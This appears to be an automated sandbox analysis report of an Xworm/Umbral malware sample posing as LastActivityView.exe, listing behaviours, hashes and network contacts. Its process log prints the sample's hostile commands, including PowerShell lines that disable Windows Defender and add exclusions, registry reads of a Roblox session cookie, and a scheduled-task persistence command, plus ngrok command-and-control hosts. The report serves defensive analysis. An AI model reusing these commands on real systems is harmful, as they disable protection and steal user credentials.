Analysis Overview
SHA256
6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
Threat Level: Known bad
The file LastActivityView.exe was found to be: Known bad.
Malicious Activity Summary
Xworm family
Detect Umbral payload
Xworm
Umbral
Detect Xworm Payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Enumerates physical storage devices
Unsigned PE
Runs ping.exe
Detects videocard installed
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-06 23:34
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-06 23:34
Reported
2024-05-06 23:37
Platform
win10-20240404-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\syjcie.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syjcie.exe | N/A |
| N/A | N/A | C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe | N/A |
| N/A | N/A | C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe" | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 4.tcp.eu.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe
"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"
C:\Users\Admin\AppData\Local\Temp\syjcie.exe
"C:\Users\Admin\AppData\Local\Temp\syjcie.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\syjcie.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\syjcie.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\syjcie.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 52.28.112.211:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 211.112.28.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 52.28.112.211:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 82.139.121.3.in-addr.arpa | udp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.121.139.82:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
| DE | 3.127.253.86:19380 | 4.tcp.eu.ngrok.io | tcp |
Files
memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
memory/1448-1-0x0000000000AD0000-0x0000000000AEC000-memory.dmp
memory/1448-2-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-7-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-8-0x00000228EE320000-0x00000228EE342000-memory.dmp
memory/96-12-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/96-13-0x00000228EE4D0000-0x00000228EE546000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqrkwlfb.uup.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/96-51-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 03c0e5299730d7840dc4ee907c2d7e2a |
| SHA1 | ad7731702af04363af05807bdcd034e87073ced2 |
| SHA256 | f3a484a2fb1e7e859c6d7950be2ebecd667e3f42c244afed7dd2b4477e83861b |
| SHA512 | 216c32835ba4024985460655c94aee41873285a7ef8b37a88970a552760cd2fd66fef02b594a3ed921433208a275d13421cfdf45bd554123f20c2ab58c2340e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 12bcbfc36299cc2f49f07e4c89e87029 |
| SHA1 | 3bb2528216e4d71ec44c57398111d40ab3b75bc7 |
| SHA256 | ef41ffde899433aaedb44745f4d43e1a486cd383c5b662f9c9279ee249335dad |
| SHA512 | 1ac4211fc339564cb2cb15e990bf3b8f5c7bace629a3f65444f526bf31c9b541bba0c65ac30145c67bac998fa3656b02b154fa9516a323271363e00b28fc68a7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a4974291e85a04444b7be80b193c8a99 |
| SHA1 | 4322a84e7b2207c02ba3fe6acf1e7ee295c8eba9 |
| SHA256 | e733390b57c1f323c7349bb6a65e8f4fe0b5b815f40a92897d4f44ac1c9ca871 |
| SHA512 | 35f8976633cbf917dc2609272fc981c736b42371ff1438ce178eb4d42b22bdf6a8aa542d620c6a201d3d7fb6dfbe10f110c5411bf44f2ee6f1cda1a151dc7ba5 |
memory/1448-186-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
memory/1448-187-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/1448-188-0x000000001B7D0000-0x000000001B7DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\syjcie.exe
| MD5 | f94e3703ca371767d93f5a88b74fbee7 |
| SHA1 | 80530e8ffb3fc7d2c36e339b70bcae0d0014b7f5 |
| SHA256 | 954af7a9095306263dce0c4d05eda925de49041ad6ea7c37a23fed8cbc97f1d7 |
| SHA512 | ca0ba2f5a26a26eeb0e15a5b99be937b7d695411f043b1629ef10f7106f26a1096229f763b0ab86796d8f37efc62f469e399206d7a8c706e4043112269f01066 |
memory/4668-194-0x0000016E260D0000-0x0000016E26110000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5477d94aecd44c4e5c1463c1c0847589 |
| SHA1 | 3f3c4f3a75229d0eccaf568c85697060f41bae9a |
| SHA256 | d8ea4c44242969f01dd40441b010d844747fec463c229b13c2836854cf7ccfc1 |
| SHA512 | 2bba1edfdc34af16f01d8fdb4c2730ad577a219721b6c8241088ce517334a7309d8d6d246f98851d73b1eeee40a6535ecdd41d517b9b0d207cf5e11762f12375 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 01b8d3a45328a2dff7f64c4bb9747dec |
| SHA1 | c33eb4823a32745cdccadb81d34ae9b325ab39c8 |
| SHA256 | 1425ed0a9cccab81ef6493ce8efe445e84e0d8567d8e0f640721c5cc79ac7697 |
| SHA512 | 201f208f52f1eb60ab221da7fef4a7988612123d865eb02cb989073458571785e4e4ece44b2ac95268e177482bdf05c6e435136aee7d71fe0fbb048ef2fcf899 |
memory/4668-269-0x0000016E27E60000-0x0000016E27EB0000-memory.dmp
memory/4668-270-0x0000016E27E30000-0x0000016E27E4E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5efef7b8b6534cf61adc5a223225b92f |
| SHA1 | 21c44e23f5b504a2c89e081fd6464bc68007ed0a |
| SHA256 | ceb1979a91fa6d97a1ebb6162d01f30d9b9527d1ba93e9dc60165cbfd3d98886 |
| SHA512 | efc60add9ea6f0f08f824d4a3d5413b8cd50f25274687fdfa466699ab49ac4504005e5b130d2149319960c636ff748e2d1f805bae168d3ef517a84bda7c2e9b7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 640e1e8914a9e4045d7c9331510cd65e |
| SHA1 | 20dbf3777f4ec696c45304b7e8b1f4ea62bcd9b8 |
| SHA256 | 3d90b754303986173f9e70e82f3d71c453cc3dd8c9effc766bf55004909078d8 |
| SHA512 | 373d84331d97e407a6ce56bae77231b15a1747c9839a27932715c2b9f81cacc41091e9d735faf0df9f228d851be402691dbeb5cf1b5807c075f996d43a723690 |
memory/4668-334-0x0000016E27E50000-0x0000016E27E5A000-memory.dmp
memory/4668-335-0x0000016E40620000-0x0000016E40632000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 73af5a2e56e321b85f04f1c431f760ea |
| SHA1 | 4ffd2aecfe9163cebacf508be261133262d675f9 |
| SHA256 | 5d53260071efea7c61647a6be8c386cd9d4651f92a5d4bd7b0ac8dc72a8f85eb |
| SHA512 | 0926185823796cc35b263ded5e30d92525453945df09bc34c1dee646d637deded9d6e15a750748f2948ddce4714f17a64da9899fda14f0feb8746b87428ec8b2 |
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
| MD5 | 499e35df562563babfff6a1d2ee71743 |
| SHA1 | 7bece5115d9df1fa43b6a7a69f9574a498388960 |
| SHA256 | 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b |
| SHA512 | 2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |